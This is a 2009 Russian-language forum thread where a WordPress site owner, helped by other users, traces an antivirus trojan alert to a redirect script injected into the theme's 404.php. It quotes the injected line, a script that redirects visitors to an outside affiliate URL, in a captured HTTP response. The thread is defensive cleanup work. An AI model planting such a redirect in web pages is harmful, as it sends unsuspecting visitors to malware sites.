Home / Обсуждения / 1001 раз про вирусы.

1001 раз про вирусы.

Поймал вот такое на сайте

25.11.2009 9:10:38    SYSTEM    1452    Sign of "JS:ScriptIP-inf [Trj]" has been found in "http://saminsky.ru/archives/613/print/\{gzip}" file.  
25.11.2009 9:10:59    SYSTEM    1452    Sign of "JS:ScriptIP-inf [Trj]" has been found in "http://saminsky.ru/favicon.ico\{gzip}" file.

Личный компьютер проверил, все чисто.

На сайте глазами проверил Index.php, глазами просмотрел все файлы темы, ничего подозрительного не видно.

По какому тексту или куску текста искать заразу? Где она может спрятаться?

0
Просмотров: 3357
Коментарии: 10
25.11.2009 08:43
Ответить
0

Еще как видно!

HTTP/1.1 404 Not Found
Date: Wed, 25 Nov 2009 08:41:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://saminsky.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=7768cb0f61311eecabaf7b63e34d906e; path=/
Last-Modified: Wed, 25 Nov 2009 08:41:18 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<script>location=’http://chilisoft.in/hitin.php?affid=02934′;</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
……

AlexS
25.11.2009 09:49
Ответить
0

Спасибо, ща запущу поиск,

КАК И ЧЕМ Вы это увидели?

В хедере темы перед !DOCTYPE html PUBLIC … ничего нет,
ничего не т в файле index темы…
ничего не т в файле index блога…

интересно… куда запрятано…

AlexS
25.11.2009 09:52
Ответить
0

Отклучил WP-PRINT – по тексту ctrl-U такой строчки не видно.
А у вас?

AlexS
25.11.2009 10:53
Ответить
0

Чудеса продолжаются:

на сайте была папка simages, в ней лежали некоторые картинки, теперь ее не видно, при попытке к ней обратиться вылетает вирус.

при просмотре .htaccess ничего постороннего не видно

Deny from 74.86.82.203 

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress


<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 212.227.127.37
deny from 91.90.13.17
deny from 92.113.118.217
deny from 89.52.82.73
deny from 89.52.124.76
deny from 77.234.
deny from 89.52.
deny from 89.208.34.136
deny from 75.126.74.178
deny from 77.241.41.155
deny from 78.129.211.120
deny from 195.225.178.29
deny from 91.124.
deny from 74.6.22.177
AlexS
25.11.2009 11:00
Ответить
0

Создал директорию, при обращении по адресу:http://saminsky.ru/simages/ вирус не обнаруживается, а вот при картинке

http://saminsky.ru/simages/pic2.gif т.е к несуществующей картинке тут же вылетает троян,

AlexS
25.11.2009 11:09
Ответить
0

Загрузил в папку картинки, обнаружение вируса прекратилось, т.е. механизм состоит в том, что при утере файла картинки происходит редирект на вирусный сайт.

Интересно, в каком месте спрятана обработка ненайденного файла…. Где искать…

kuzmi4
25.11.2009 11:26
Ответить
0

Файл header.php смотрите и смените пароль на FTP.

AlexS
25.11.2009 11:40
Ответить
0

Нашел в странице 404.php темы….

Остается понять, как туда попал мерзавец.

FTP пароль я сменил, доступ к папкам стоял правильно

25.11.2009 12:23
Ответить
0
КАК И ЧЕМ Вы это увидели?

У меня есть специальный инструмент 🙂 Вообще-то он был сделан для обнаружения горячо любимого BOM и глупостей в http-заголовках. Но и для обнаружения вирусяки, как выяснилось, сгодился.

AlexS
25.11.2009 13:18
Ответить
0

Всеравно спасибо за помощь :)))

Свежее

Anonymous
Отправить
Ответ на: